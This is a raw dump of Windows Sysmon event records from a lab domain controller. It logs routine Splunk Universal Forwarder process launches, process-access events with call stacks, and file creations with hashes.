10341000x80000000000000002202725Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202724Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202723Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202722Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E91D-6040-2F4E-00000000AD01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202721Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E91D-6040-2F4E-00000000AD01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202720Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.445{5ABCFE62-E91D-6040-2F4E-00000000AD01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002202748Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.913{5ABCFE62-E91E-6040-314E-00000000AD01}54405180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202747Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E91E-6040-314E-00000000AD01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202746Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202745Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202744Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202743Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202742Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E91E-6040-314E-00000000AD01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202741Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E91E-6040-314E-00000000AD01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202740Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.788{5ABCFE62-E91E-6040-314E-00000000AD01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202739Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.522{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D64D744EBA153BF2E79A716B7B999FC,SHA256=809222A311E732BD6713CC135F787AA1A736980B24527AD842838D5E8D690361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202738Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.491{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC82945D3A2AE6B252807E13E08DC9C2,SHA256=4C94247235912FB3C1715C8BC994D71ED5F80E43D88AF066D7614E15359D906F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202737Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.241{5ABCFE62-E91E-6040-304E-00000000AD01}71003832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202736Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E91E-6040-304E-00000000AD01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202735Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202734Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202733Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202732Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202731Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E91E-6040-304E-00000000AD01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202730Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.116{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E91E-6040-304E-00000000AD01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202729Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:18.117{5ABCFE62-E91E-6040-304E-00000000AD01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202759Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.788{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=801912A79A61913951F7D1A3A6B341A0,SHA256=6D043604CB867EA74ABE75E33A813FC257659D781D6EA905AF6406E8F61716DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202758Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.585{5ABCFE62-E91F-6040-324E-00000000AD01}3480688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202757Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.522{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39061DAC69212A9501F60DB0642E8C2B,SHA256=BD92FD5456235372A6AA921F202DDAAF200E08DC3B62BBA8B77AD0967EAF3593,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202756Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:19.460{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E91F-6040-324E-00000000AD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202755Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 